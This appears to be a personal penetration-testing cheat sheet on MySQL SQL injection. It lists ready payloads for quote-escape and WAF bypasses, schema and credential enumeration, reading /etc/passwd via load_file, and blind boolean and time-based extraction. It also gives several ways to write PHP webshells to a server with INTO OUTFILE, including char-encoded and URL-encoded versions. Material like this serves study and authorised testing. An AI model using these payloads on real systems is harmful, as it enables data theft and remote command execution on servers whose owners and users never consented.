Connecting
mysql -h xx -u root
(add -p if password needed. Use 127.0.0.1, not locahost then use -P to specify port)
Querying / Exploiting
For MySQL/MSSQL: select @@version can return the version, others will error
%09 can be used in case space is filtered. Of course comments can also.
\xBF' or URL encoded %bf%27 to create a single quote that won’t be escaped properly. (only in GBK) Example: admin%bf%27%20or%201=1%20--+
sleep(5) will delay 5 seconds
check can how many columns: order by x, keep on increasing until error. last number will be number of columns
Concatenating (concatenate put 2 together, group concatenate put all the values in one column as one): concat(name1,":",name2) or group_concat(column_name)
To comment, use xx--
(got space in the end, important)
Show all databases: select schema_name from information_schema.schemata;
OR show databases;
show the database in the current one: select database()
Show the table name and which database it is from, for a database call xx: select table_name, table_schema from information_schema.tables where table_schema='xx'
Show the column name if table name is yy: select column_name,table_schema from information_schema.columns where table_name='yy'
Finally to retrieve the info use select bb, cc from xx.yy
See which user logged in: select user()
Check if got superuser privilege: select super_priv from mysql.user where user="xx"
Check privilege in detailed: select grantee, privilege_type from information_schema.user_privileges
Read file from OS: select load_file("/etc/passwd")
(Can attempt to load the current php page to disclose sensitive info using default path like /var/www/html/xx.php) USE DOUBLE SLASH FOR WINDOWS IF FAIL
Check secure file privileges: SELECT variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv"
(Empty=can read/write everywhere. If got a folder name means only read/write from there. NULL=read/write nowhere)
Write file into OS (must have FILE privilege, secure_file_priv not enabled, and write access to the server): select "xxx" into outfile "/var/html/www/test.php"
(c:/xampp/htdocs/ can try too) USE DOUBLE SLASH FOR WINDOWS IF FAIL
For example to write webshell, can use
select "", "<?php system($_REQUEST[0]); ?>","" into outfile "/var/www/html/test.php"
One example of full writing webshell to Windows (bypassing waf/encoding):
UNION SELECT char(60,63,112,104,112,32,115,121,115,116,101,109,40,36,95,82,69,81,85,69,83,84,91,48,93,41,59,32,63,62) INTO OUTFILE "C:\\wamp\\www\\PHP\\shell1.php"
Another webshell example tested on MariaDB using the encoded version:
Text: ' UNION SELECT ("<?php echo passthru($_GET['cmd']);") INTO OUTFILE 'C:/xampp/htdocs/cmd.php' --
Encoded: %27+UNION+SELECT+%28%22%3C%3Fphp+echo+passthru%28%24_GET%5B%27cmd%27%5D%29%3B%22%29+INTO+OUTFILE+%27C%3A%2Fxampp%2Fhtdocs%2Fcmd.php%27+--+
Blind boolean based: First still try to establish the number of columns (order by x/union select null,null..). Once established, use the following (if eg previously is 3 columns) to get database name: union select null,null,null where database() like '%';--
after that union select null,null,null where database() like 'a%';--
and keep on until you get database name.
To get table name, use union select null,null,null from information_schema.tables where table_schema = 'dbname' and table_name like 'a%';--
Finally to get column name, use union select null,null,null from information_schema.columns where table_schema='dbname' and table_name='tablename' and column_name like 'a%';--
To remove as there are multiple columns, use union select null,null,null from information_schema.columns where table_schema='dbname' and table_name='tablename' and column_name like 'a%' and column_name!='notthis';--
After getting all details, use the following to extract the information union select 1,2,3 from dbname.tablename where columnname like 'a%';--
Repeat for multiple column names.
Blind time based: Almost same as blind boolean. First establish number of columns while setting one of them to sleep(5), and keep on adding until you get a different response time which means that is the correct number of columns. Example: union select sleep(5),null;-- . After that just follow blind boolean based.